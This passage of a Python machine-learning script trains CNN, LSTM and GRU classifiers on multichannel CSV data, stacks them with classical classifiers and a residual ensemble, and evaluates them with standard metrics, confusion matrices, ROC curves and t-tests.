classification_report, confusion_matrix, accuracy_score, ConfusionMatrixDisplay\nfrom sklearn.metrics import cohen_kappa_score, roc_auc_score,f1_score,precision_score,recall_score, roc_curve\nfrom scipy.stats import ttest_rel\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport tensorflow as tf\ntf.random.set_seed(1234)\nfrom tensorflow.keras.layers import BatchNormalization, ReLU, GRU, Input, SpatialDropout1D, Bidirectional, MaxPooling2D, MaxPooling1D, Conv1D, Dense, Flatten, Dropout, LSTM, concatenate, Conv2D\nfrom tensorflow.keras.optimizers import Adam,SGD\n# from tensorflow.keras import regularizers\nfrom tensorflow.keras.models import Model, load_model, Sequential\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.losses import CategoricalCrossentropy\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint\n\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\n# from sklearn.naive_bayes import GaussianNB\nfrom sklearn import tree\nimport pickle\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ninput_fodler = 'whole_data' # Data Folder Path\n\n\n\nimport keras.backend as K\nfrom keras.layers import Layer\n\nclass RBFLayer(Layer):\n def __init__(self, units, gamma, **kwargs):\n super(RBFLayer, self).__init__(**kwargs)\n self.units = units\n self.gamma = K.cast_to_floatx(gamma)\n\n def build(self, input_shape):\n self.mu = self.add_weight(name='mu',\n shape=(int(input_shape[1]), self.units),\n initializer='uniform',\n trainable=True)\n super(RBFLayer, self).build(input_shape)\n\n def call(self, inputs):\n diff = K.expand_dims(inputs) - self.mu\n l2 = K.sum(K.pow(diff, 2), axis=1)\n res = K.exp(-1 * self.gamma * l2)\n return res\n\n\n# class SelfAttention(tf.keras.layers.Layer):\n# def __init__(self, d_model):\n# super(SelfAttention, self).__init__()\n# self.d_model = d_model\n\n# def build(self, input_shape):\n# self.W_q = self.add_weight(name=\"W_q\", shape=(self.d_model, self.d_model), initializer=\"uniform\")\n# self.W_k = self.add_weight(name=\"W_k\", shape=(self.d_model, self.d_model), initializer=\"uniform\")\n# self.W_v = self.add_weight(name=\"W_v\", shape=(self.d_model, self.d_model), initializer=\"uniform\")\n\n# def call(self, inputs):\n# q = tf.matmul(inputs[0], self.W_q)\n# k = tf.matmul(inputs[1], self.W_k)\n# v = tf.matmul(inputs[2], self.W_v)\n\n# attention_scores = tf.matmul(q, k, transpose_b=True)\n# attention_scores = attention_scores / tf.math.sqrt(tf.cast(self.d_model, tf.float32))\n\n# attention_weights = tf.nn.softmax(attention_scores, axis=-1)\n# output = tf.matmul(attention_weights, v)\n\n# return output \n\n\nclass Models_class__:\n def __init__(self):\n self.epochs = 100\n self.batch_size = 32\n self.verbose = 1\n self.neurons_models = 128\n self.lr = 0.01\n self.lat_layer_activation = 'softmax'\n self.early_Stop = 100\n self.group_rows = 5\n self.chennels = 8\n self.classes = 4\n self.remove_from_start = 0 # keep 0 if nothing to drop from start\n self.remove_from_end = 1 # keep 1 if nothing to drop from end\n\n self.histories = []\n self.accuracies = {}\n self.accuracies['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n\n self.cohen_kappa_score = {}\n self.cohen_kappa_score['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n\n 
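# Added note: the same 14-model ordering is repeated for every metric dict in this __init__; run() later appends one column per input CSV, presumably so rows stay aligned across all metric tables.\n        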
self.roc_auc_score = {}\n self.roc_auc_score['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n\n self.f1_score = {}\n self.f1_score['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n self.precision_score = {}\n self.precision_score['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n self.recall_score = {}\n self.recall_score['models'] = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n\n self.classes_names = [str(i) for i in range(self.classes)]\n if len(self.classes_names)==2:\n self.Multi_class = False\n\n elif len(self.classes_names)>2:\n self.Multi_class = True\n\n def perform_t_test(self,df):\n\n m = len(df)-1\n proposed = df.iloc[-1,1:-1]\n p_value_thres = 0.05\n models_name = ['proposed','Stacked','CNN','LSTM','Bi-LSTM',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'bi_lstm_lr', 'bi_lstm_svm', 'bi_lstm_dt'\n\n ]\n all_p_values = []\n for i in range(m):\n p_value = ttest_rel(a=proposed, b=df.iloc[i,1:-1]).pvalue\n check_p_value = p_value/m\n # print(models_name[i], p_value,'p/m',check_p_value)\n if check_p_value>p_value_thres:\n print('need to discard',models_name[i])\n m = m-1\n all_p_values.append(p_value)\n\n all_p_values.append(check_p_value)\n\n df['ttest_p_value'] = all_p_values\n\n return df\n\n def evaluation(self,\n y_true,y_pred,name):\n\n auc = []\n auc.append(np.round(accuracy_score(y_true,y_pred),4))\n\n auc.append(np.round(cohen_kappa_score(y_true,y_pred),4))\n if self.Multi_class:\n auc.append(np.round(roc_auc_score(y_true,\n to_categorical(y_pred,num_classes=self.classes),\n multi_class = 'ovr'),4))\n auc.append(np.round(f1_score(y_true,y_pred,\n average = 'macro'),4))\n auc.append(np.round(precision_score(y_true,y_pred,\n average = 'macro'),4))\n auc.append(np.round(recall_score(y_true,y_pred,\n average = 'macro'),4))\n else:\n auc.append(np.round(roc_auc_score(y_true,y_pred),4))\n auc.append(np.round(f1_score(y_true,y_pred),4))\n auc.append(np.round(precision_score(y_true,y_pred),4))\n auc.append(np.round(recall_score(y_true,y_pred),4))\n\n print(name+' accuracy:',auc[0])\n\n cm = confusion_matrix(y_true,y_pred)\n\n disp = ConfusionMatrixDisplay(cm,\n display_labels=self.classes_names)\n disp.plot()\n plt.title('Confusion matrix',fontsize=20, fontweight='bold')\n\n plt.xlabel('Predicted Values',fontsize=18, fontweight='bold')\n plt.ylabel('True Values',fontsize=18, fontweight='bold')\n\n plt.tight_layout()\n plt.savefig(os.path.join(self.output_folder,name+'_confusion_matrics.png'))\n report = classification_report(y_true,y_pred, target_names=self.classes_names,output_dict=True) #classification report\n df = pd.DataFrame(report).transpose()\n\n df.insert(0, \"\", [str(i) for i in range(self.classes)] +['accuracy','macro avg','weighted avg'])\n df.to_csv(os.path.join(self.output_folder,name+'_classification_report.csv'),index = False)\n\n return auc\n def get_CNN(self, input_size):\n # Initialising the CNN\n model = Sequential()\n\n model.add(Conv1D(self.neurons_models, kernel_size=2,\n activation='relu', input_shape=input_size,\n kernel_regularizer = 'L1L2',\n bias_regularizer = 'L2',\n \n ))\n 
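# Added note (hedged): a second Conv1D block follows; L1L2 kernel/activity regularizers are applied throughout this builder, presumably to curb overfitting on the small 5x8 input windows.\n        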
model.add(Conv1D(self.neurons_models, kernel_size=2, activation='relu',\n kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n model.add(SpatialDropout1D(0.2))\n model.add(MaxPooling1D(pool_size=3,data_format='channels_last'))\n # model.add(BatchNormalization())\n # model.add(Conv1D(self.neurons_models, kernel_size=2, activation='relu'))\n\n model.add(Flatten())\n \n # model.add(Dropout(0.1))\n model.add(Dense(32, activation='relu',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n \n model.add(BatchNormalization())\n model.add(Dense(self.classes, activation=self.lat_layer_activation))\n\n # Compliling the model\n model.compile(optimizer=Adam(learning_rate=self.lr),\n loss=CategoricalCrossentropy(),\n metrics=['accuracy'])\n # print(model.summary())\n return model\n\n def get_LSTM(self, input_size):\n # Initialising the LSTM\n model = Sequential()\n\n model.add(LSTM(self.neurons_models, input_shape=input_size, return_sequences=True,\n kernel_regularizer = 'L1L2',\n bias_regularizer = 'L2',))\n model.add(LSTM(self.neurons_models, return_sequences=True,\n kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n model.add(SpatialDropout1D(0.2))\n model.add(MaxPooling1D(pool_size=3))\n # model.add(BatchNormalization())\n\n model.add(Flatten())\n # model.add(Dropout(0.2))\n model.add(Dense(32, activation='relu',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n model.add(BatchNormalization())\n\n model.add(Dense(self.classes, activation=self.lat_layer_activation))\n\n # Compliling the model\n model.compile(optimizer=Adam(learning_rate=self.lr),\n loss=CategoricalCrossentropy(),\n metrics=['accuracy'])\n return model\n\n def get_BI_LSTM(self, input_size):\n # Initialising the BI-LSTM\n model = Sequential()\n\n model.add(GRU(self.neurons_models, input_shape=input_size, return_sequences=True,\n kernel_regularizer = 'L1L2',\n bias_regularizer = 'L2',))\n model.add(GRU(self.neurons_models, return_sequences=True,\n kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n model.add(SpatialDropout1D(0.2))\n model.add(MaxPooling1D(pool_size=3))\n # model.add(BatchNormalization())\n\n\n model.add(Flatten())\n # model.add(Dropout(0.2))\n model.add(Dense(32, activation='relu',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2'))\n model.add(BatchNormalization())\n\n model.add(Dense(self.classes, activation=self.lat_layer_activation))\n\n # Compliling the model\n model.compile(optimizer=Adam(learning_rate=self.lr),\n loss=CategoricalCrossentropy(),\n metrics=['accuracy'])\n return model\n\n def train(self, path='',):\n\n MC = ModelCheckpoint(\n filepath=path,\n monitor=\"val_accuracy\",\n verbose=0,\n mode=\"auto\",\n save_best_only=True,\n )\n\n er = EarlyStopping(\n monitor=\"val_accuracy\",\n min_delta=0,\n patience=self.early_Stop,\n verbose = self.verbose,\n mode=\"auto\",\n baseline=None,\n restore_best_weights=True)\n\n lr = ReduceLROnPlateau(\n monitor='val_accuracy',\n factor=0.1,\n patience=5,\n verbose = self.verbose,\n mode='auto',\n min_delta=0.01,\n cooldown=0,\n min_lr=0,)\n\n history = self.model.fit(self.X_train, self.Y_train,\n batch_size=self.batch_size,\n epochs=self.epochs,\n verbose=self.verbose,\n validation_data=(self.X_test, self.Y_test),\n callbacks=[MC, er, lr],\n )\n # self.histories.append(history)\n\n plt.figure(figsize=(15, 10))\n # plt.figure()\n plt.subplot(1, 2, 2)\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('Model Accuracy',fontsize=26, fontweight='bold')\n 
plt.xlabel('Epochs',fontsize=22, fontweight='bold')\n plt.ylabel('Accuracy',fontsize=22, fontweight='bold')\n plt.legend(['train', 'test'], loc='upper left',fontsize=20)\n plt.xticks(fontsize=20, fontweight='bold')\n plt.yticks(fontsize=20, fontweight='bold')\n plt.ylim(0.0, 1.0)\n\n plt.subplot(1, 2, 1)\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model Loss',fontsize=26, fontweight='bold')\n plt.xlabel('Epochs',fontsize=22, fontweight='bold')\n plt.ylabel('Loss',fontsize=22, fontweight='bold')\n plt.legend(['train', 'test'], loc='upper left',fontsize=20)\n plt.xticks(fontsize=20, fontweight='bold')\n plt.yticks(fontsize=20, fontweight='bold')\n plt.ylim(0.0, 1.0)\n\n file_name = os.path.basename(path)[:-3]\n\n plt.tight_layout()\n plt.savefig(os.path.join(self.output_folder, file_name+'.png'))\n\n # plt.show()\n\n plt.close('all')\n # if 'proposed' in file_name:\n # self.model = load_model(path,custom_objects={'SelfAttention':SelfAttention,\n # 'RBFLayer':RBFLayer})\n # else:\n self.model = load_model(path)\n\n def create_dataset(self, csv_path):\n df = pd.read_csv(csv_path)\n \n # oxygeneted = [i for i in df.columns if '_O' in i] + [df.columns[-1]]\n # df = df[oxygeneted]\n\n # data = df.dropna()\n# Separate features and labels\n # X = data.iloc[:, :-1] # Features (exclude the last column)\n # y = data.iloc[:, -1] # Labels (last column)\n# print(y)\n# Apply RandomOverSampler to balance the classes\n # ros = RandomOverSampler(random_state=42)\n # X_resampled, y_resampled = ros.fit_resample(X, y)\n\n# Create a new balanced DataFrame\n # balanced_data = pd.concat([X_resampled, y_resampled], axis=1)\n\n# Save the balanced data to a new CSV file\n # balanced_data.to_csv('balanced_dataset.csv', index=False)\n # df = pd.read_csv('balanced_dataset.csv', header=None)\n df = df.dropna()\n\n df= df.iloc[self.remove_from_start+1:-self.remove_from_end,:]\n # # print(df)\n # df_numpy = df.to_numpy()\n # df_numpy_n = df_numpy[:, :-1]\n\n # scaler = MinMaxScaler()\n # scaler.fit(df_numpy_n)\n\n # self.df = pd.DataFrame(scaler.transform(\n # df.iloc[:, :-1]), index=df.index, columns=None)\n # self.df['labels'] = df.iloc[:, -1]\n self.df = df\n\n def create_output_folder(self, csv_path):\n\n self.folder_name = os.path.basename(csv_path)[:-4]\n self.output_folder = os.path.join('output', self.folder_name)\n\n if not os.path.exists(self.output_folder):\n os.makedirs(self.output_folder)\n\n def model_layers_seting(self, input,model):\n \n model.layers[0].trainable = False\n new_model = model.layers[0](input)\n for layer in model.layers[1:-3]:\n # Freeze the layers\n layer.trainable = False\n new_model = layer(new_model)\n return new_model\n\n def stacking_model(self, CNN_model, LSTM_model, BI_LSTM_model,\n input_shape=(2, 20)):\n\n input = Input(shape=input_shape)\n CNN_model = self.model_layers_seting( input,CNN_model)\n LSTM_model = self.model_layers_seting( input,LSTM_model)\n BI_LSTM_model = self.model_layers_seting( input,BI_LSTM_model)\n\n x = concatenate([CNN_model, LSTM_model, BI_LSTM_model], axis=1)\n x = Dense(32, activation='relu', name = 'stacking_1',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2')(x)\n x = Dense(32, activation='relu', name = 'stacking_2',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2')(x)\n out = Dense(self.classes, activation=self.lat_layer_activation, name='otput_layer')(x)\n\n model_new = Model(inputs=input, outputs=out)\n model_new.compile(optimizer=Adam(learning_rate=self.lr),\n loss = 
CategoricalCrossentropy(),\n metrics=['accuracy'])\n return model_new\n \n \n def Resnet_stacking_model(self, CNN_model, LSTM_model, BI_LSTM_model,\n input_shape=(2, 20)):#Radial Basis Function Networks\n \n input = Input(shape=input_shape)\n CNN_model = self.model_layers_seting( input,CNN_model)\n LSTM_model = self.model_layers_seting( input,LSTM_model)\n BI_LSTM_model = self.model_layers_seting( input,BI_LSTM_model)\n \n # x = SelfAttention(128)([CNN_model, LSTM_model, BI_LSTM_model])\n x = Flatten()(input)\n # x = RBFLayer(128,0.3)(x)\n x = Dense(128, activation='gelu',)(x)\n \n CNN_model = tf.keras.layers.Add()([CNN_model,x])\n LSTM_model = tf.keras.layers.Add()([LSTM_model,x])\n BI_LSTM_model = tf.keras.layers.Add()([BI_LSTM_model,x])\n \n x = concatenate([CNN_model, LSTM_model, BI_LSTM_model], axis=1)\n # x = Flatten()(input)\n \n \n # x = RBFLayer(128, 0.1)(x) # to look global patterns\n # x = RBFLayer(64, 0.3)(x) # to look local pattern or close relations.\n # x = RBFLayer(64, 0.5)(x) # to look local pattern or close relations.\n # x = RBFLayer(32, 0.5)(x) # to look local pattern or close relations.\n x = Dense(64, activation='relu', name = 'stacking_1',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2')(x)\n x = Dense(64, activation='relu', name = 'stacking_2',kernel_regularizer = 'L1L2',\n activity_regularizer = 'L1L2')(x)\n \n out = Dense(self.classes, activation=self.lat_layer_activation, name='otput_layer')(x)\n\n model_new = Model(inputs=input, outputs=out)\n # print(model_new.summary())\n model_new.compile(optimizer=Adam(learning_rate=self.lr),\n loss = CategoricalCrossentropy(),\n metrics=['accuracy'])\n return model_new\n \n\n def load_DL_models(self):\n LSTM_model = load_model(os.path.join(self.output_folder, 'LSTM.h5'))\n BI_LSTM_model = load_model(os.path.join(self.output_folder, 'GRU.h5'))\n CNN_model = load_model(os.path.join(self.output_folder, 'CNN.h5'))\n return CNN_model, LSTM_model, BI_LSTM_model\n\n def remove_last_layer(self,model):\n model_new = Sequential()\n for layer in model.layers[:-3]: # this is where I changed your code\n layer.trainable = False\n model_new.add(layer)\n return model_new\n\n def get_train_test_feautures(self,model):\n return model.predict(self.X_train,verbose = self.verbose), model.predict(self.X_test,verbose = self.verbose)\n\n\n def single_ml_train(self, model,train_cnn_feats, test_cnn_feats,\n name=''):\n\n model.fit(train_cnn_feats,np.argmax(self.Y_train,axis = 1))\n y_pred = model.predict(test_cnn_feats)\n self.predictions.append(model.predict_proba(test_cnn_feats))\n acc = self.evaluation(np.argmax(self.Y_test,axis = 1),y_pred,\n name = name)\n\n # save the model to disk\n model_path = os.path.join(self.output_folder, name+'.sav')\n pickle.dump(model, open(model_path, 'wb'))\n\n return acc\n\n def get_model_features_with_FFT(self,model):\n model_new = self.remove_last_layer(model)\n train_feats, test_feats = self.get_train_test_feautures(model_new)\n return np.fft.fft(train_feats).real, np.fft.fft(test_feats).real\n\n\n def ML_classifier_train(self,model,name):\n\n model_new = self.remove_last_layer(model)\n train_feats, test_feats = self.get_train_test_feautures(model_new)\n\n LR = LogisticRegression()\n lr_acc = self.single_ml_train(LR,train_feats, test_feats,\n name=name+'_Logistic_regression')\n\n\n svm = SVC(kernel='linear',probability=True)\n svm_acc = self.single_ml_train(svm,train_feats, test_feats,\n name=name+'_svm')\n\n # nb = GaussianNB()\n # nb_acc = self.single_ml_train(nb,train_feats, test_feats,\n # 
name=name+'_naive_bayes')\n\n dt = tree.DecisionTreeClassifier()\n dt_acc = self.single_ml_train(dt,train_feats, test_feats,\n name=name+'_decision_tree')\n\n return lr_acc, svm_acc, dt_acc\n\n def train_evaluate(self, name = 'model', epochs = 0):\n\n # print(self.model.summary())\n print('Training:',name)\n self.train(path=os.path.join(self.output_folder, name+'.h5'))\n y_pred = self.model.predict(self.X_test,verbose = self.verbose)\n self.predictions.append(y_pred)\n acc = self.evaluation(np.argmax(self.Y_test,axis = 1),np.argmax(y_pred,axis = 1),\n name = name)\n return acc\n\n def ROC_curve(self):\n y_test = np.argmax(self.Y_test,axis = 1)\n models_name = ['proposed','Stacked','CNN','LSTM','GRU',\n 'lstm_lr', 'lstm_svm', 'lstm_dt',\n 'cnn_lr', 'cnn_svm', 'cnn_dt',\n 'gru_lr', 'gru_svm', 'gru_dt'\n\n ]\n\n colors = ['black','brown','red','orange','yellow','limegreen','lime','cyan','teal',\n 'deepskyblue','olive','navy','violet','purple','slategray']\n\n plt.figure(figsize=(15, 10))\n\n for i,probs in enumerate(self.predictions[:5]):\n # print(i,len(probs),models_name[i])\n fpr1, tpr1, thresh1 = roc_curve(y_test, probs[:,1], pos_label=1)\n plt.plot(fpr1, tpr1, label=models_name[i],color= colors[i])\n\n plt.legend(fontsize=15)\n plt.title('ROC curve',fontsize=26, fontweight='bold')\n plt.xlabel('False Positive Rate',fontsize=22, fontweight='bold')\n plt.ylabel('True Positive rate',fontsize=22, fontweight='bold')\n plt.xticks(fontsize=20, fontweight='bold')\n plt.yticks(fontsize=20, fontweight='bold')\n plt.ylim(0.0, 1.0)\n plt.tight_layout()\n plt.savefig(os.path.join(self.output_folder, 'ROC_Curve.png'))\n plt.close('all')\n # raise Exception\n\n def run(self, csv_path):\n\n self.predictions = []\n self.create_output_folder(csv_path)\n self.create_dataset(csv_path)\n groupped = self.df.groupby(self.df.columns[-1])\n # print(self.df)\n\n all_features = None\n all_labels = None\n\n for i in self.classes_names:\n i = int(i)\n data = groupped.get_group(i)\n if not len(data) % self.group_rows == 0:\n rt_ = len(data) % self.group_rows\n data = data.iloc[:-rt_, :]\n\n df_numpy = data.to_numpy()\n df_numpy_n = df_numpy[:, :-1]\n new_df_numpy_n = df_numpy_n.reshape(\n (df_numpy_n.shape[0]//self.group_rows, self.group_rows, self.chennels))\n # print(new_df_numpy_n.shape)\n y = df_numpy[:, -1]\n y = y.reshape((new_df_numpy_n.shape[0], self.group_rows))\n y = y[:, 1]\n\n if i == 0:\n all_features = new_df_numpy_n\n all_labels = y\n else:\n all_features = np.concatenate(\n (all_features, new_df_numpy_n), axis=0)\n all_labels = np.concatenate((all_labels, y), axis=0)\n\n\n y = to_categorical(all_labels,num_classes=self.classes)\n \n \n\n self.X_train, self.X_test, self.Y_train, self.Y_test = train_test_split(\n all_features, y, test_size=0.2)\n \n \n # x_train = np.reshape(self.X_train,(*self.X_train.shape[:-2],-1))\n # x_test = np.reshape(self.X_test,(*self.X_test.shape[:-2],-1))\n \n # from minisom import MiniSom\n # som = MiniSom(64,20, 40, sigma=0.3, learning_rate=0.5) # initialization of 6x6 SOM\n # som.train(x_train, 10) # trains the SOM with 100 iterations\n # print(x_train.shape)\n # s = som.get_weights()\n # print(s.shape)\n # s= list( som.win_map(x_train).values())\n # print(len(s))\n # self.X_train = []\n # for i in s:\n # self.X_train.append(i[0])\n # self.X_train = np.array(self.X_train)\n \n # print(sn.values())\n # for i in sn:\n # print(sn[i])\n # print(sn[i].tolist())\n # # print(list(self.X_train))\n # print('sss')\n # print(self.X_train)\n\n \n print(\"Data shape:\", 
self.X_train.shape, self.Y_train.shape)\n\n        \"\"\"\n        CNN + LSTM + Bi-LSTM\n        \"\"\"\n        self.model = self.get_CNN(self.X_train.shape[1:])\n        cnn_auc = self.train_evaluate( name = 'CNN')\n\n\n        self.model = self.get_LSTM(self.X_train.shape[1:])\n        lstm_auc = self.train_evaluate( name = 'LSTM')\n\n        self.model = self.get_BI_LSTM(self.X_train.shape[1:])\n        bi_lstm_auc = self.train_evaluate( name = 'GRU')\n\n        \"\"\"\n        Load all models\n        \"\"\"\n        CNN_model, LSTM_model, BI_LSTM_model = self.load_DL_models()\n\n        \"\"\"\n        train all ML models: DL_algos -> ML models\n        \"\"\"\n\n        print('Training: Machine learning algorithms')\n        cnn_lr_acc, cnn_svm_acc, cnn_dt_acc = self.ML_classifier_train(CNN_model,'CNN')\n        lstm_lr_acc, lstm_svm_acc, lstm_dt_acc = self.ML_classifier_train(LSTM_model,'LSTM')\n        bi_lstm_lr_acc, bi_lstm_svm_acc, bi_lstm_dt_acc = self.ML_classifier_train(BI_LSTM_model,'GRU')\n\n        \"\"\"\n        Stacking model: DL_algos -> stacking\n        \"\"\"\n        self.model = self.stacking_model(CNN_model, LSTM_model, BI_LSTM_model,\n                                         input_shape=self.X_train.shape[1:])\n        # plot_model(self.model,to_file = os.path.join(self.output_folder,'stacked.png'))\n        stacked_auc = self.train_evaluate( name = 'stacked_model')\n\n        \"\"\"\n        Proposed method: DL_algos -> stacking -> RBF\n        \"\"\"\n        cnn_fft_train,cnn_fft_test = self.get_model_features_with_FFT(CNN_model)\n        lstm_fft_train,lstm_fft_test = self.get_model_features_with_FFT(LSTM_model)\n        bi_lstm_fft_train,bi_lstm_fft_test = self.get_model_features_with_FFT(BI_LSTM_model)\n\n\n        stacked_fft_train = np.hstack((cnn_fft_train, lstm_fft_train,bi_lstm_fft_train))\n        train_shape = stacked_fft_train.shape\n        self.X_train = stacked_fft_train.reshape((train_shape[0],-1))\n\n\n        # stacked_fft_test = np.hstack((cnn_fft_test, lstm_fft_test,bi_lstm_fft_test))\n        # test_shape = stacked_fft_test.shape\n        # self.X_test = stacked_fft_test.reshape((test_shape[0],-1))\n\n        # input_ = Input(shape=self.X_train.shape[1:])\n        # x = Dense(32, activation='relu', name = 'stacking_1',kernel_regularizer = 'L1L2',\n        #           activity_regularizer = 'L1L2')(input_)\n        # x = Dense(32, activation='relu', name = 'stacking_2',kernel_regularizer = 'L1L2',\n        #           activity_regularizer = 'L1L2')(x)\n        # # x = Dense(32, activation='relu', name = 'stacking_3')(x)\n        # out = Dense(self.classes, activation=self.lat_layer_activation, name='otput_layer')(x)\n\n        # self.model = Model(inputs=input_, outputs=out)\n        # self.model.compile(optimizer=Adam(learning_rate=0.0001),\n        #                    loss = CategoricalCrossentropy(),\n        #                    metrics=['accuracy'])\n\n        \n        self.model = self.Resnet_stacking_model(CNN_model, LSTM_model, BI_LSTM_model,\n                                                input_shape=self.X_train.shape[1:])\n        \n        proposed_acc = self.train_evaluate(name = 'proposed')\n        self.ROC_curve()\n\n        metric = 0\n        self.accuracies[self.folder_name] = [proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n                                             lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n                                             cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n                                             bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n                                             ]\n\n\n        metric = 1\n        self.cohen_kappa_score[self.folder_name] = [proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n                                                    lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n                                                    cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n                                                    bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n                                                    ]\n\n\n        metric = 2\n        self.roc_auc_score[self.folder_name] = 
[proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n ]\n\n\n metric = 3\n self.f1_score[self.folder_name] = [proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n ]\n\n\n metric = 4\n self.precision_score[self.folder_name] = [proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n ]\n\n metric = 5\n self.recall_score[self.folder_name] =[proposed_acc[metric],stacked_auc[metric],cnn_auc[metric],lstm_auc[metric],bi_lstm_auc[metric],\n lstm_lr_acc[metric], lstm_svm_acc[metric], lstm_dt_acc[metric],\n cnn_lr_acc[metric], cnn_svm_acc[metric], cnn_dt_acc[metric],\n bi_lstm_lr_acc[metric], bi_lstm_svm_acc[metric], bi_lstm_dt_acc[metric]\n\n ]\n\n\n\nm = Models_class__()\nfiles = sorted(glob.glob(os.path.join(input_fodler, '*.csv')))[:10]\n\n# print(files)\n\nfor file in tqdm.tqdm(files):\n print(file)\n m.run(file)\n\n\n# path = os.path.join('output','subjects_avg_acc_loss')\n# if not os.path.exists(path):\n# os.makedirs(path)\n# for i,model in enumerate(['proposed','Stacked','CNN','LSTM','BI_LSTM']):\n\n# histories = []\n# for j in range(i,i+(len(m.histories)//5)):\n# # print(len(m.histories),j)\n# histories.append(m.histories[j])\n\n# acc =[]\n# loss = []\n# val_acc = []\n# val_loss = []\n\n# for hist in histories:\n# acc.append(hist.history['accuracy'])\n# val_acc.append(hist.history['val_accuracy'])\n# loss.append(hist.history['loss'])\n# val_loss.append(hist.history['val_loss'])\n\n# acc = np.mean(acc,axis = 0)\n# loss = np.mean(loss,axis = 0)\n# val_acc = np.mean(val_acc,axis = 0)\n# val_loss = np.mean(val_loss,axis = 0)\n\n\n\n# plt.figure(figsize=(20, 15))\n# # plt.figure()\n# plt.subplot(1, 2, 2)\n# plt.plot(acc)\n# plt.plot(val_acc)\n# plt.title(f'{model} Accuracy',fontsize=26, fontweight='bold')\n# plt.xlabel('Epochs',fontsize=22, fontweight='bold')\n# plt.ylabel('Accuracy',fontsize=22, fontweight='bold')\n# plt.legend(['train', 'test'], loc='upper left',fontsize=20)\n# plt.xticks(fontsize=20, fontweight='bold')\n# plt.yticks(fontsize=20, fontweight='bold')\n# plt.ylim(0.0, 1.0)\n# # colors = colors\n# plt.subplot(1, 2, 1)\n# plt.plot(loss)\n# plt.plot(val_loss)\n# plt.title(f'{model} Loss',fontsize=26, fontweight='bold')\n# plt.xlabel('Epochs',fontsize=22, fontweight='bold')\n# plt.ylabel('Loss',fontsize=22, fontweight='bold')\n# plt.legend(['train', 'test'], loc='upper left',fontsize=20)\n# plt.xticks(fontsize=20, fontweight='bold')\n# plt.yticks(fontsize=20, fontweight='bold')\n# plt.ylim(0.0, 1.0)\n# file_path = os.path.join(path,f'{model}.png')\n# plt.tight_layout()\n# plt.savefig(file_path)\n# # plt.show()\n# plt.close('all')\n\n\n\ndef avgs_std_dev(df,name = ''):\n avgs = []\n dev = []\n for i in 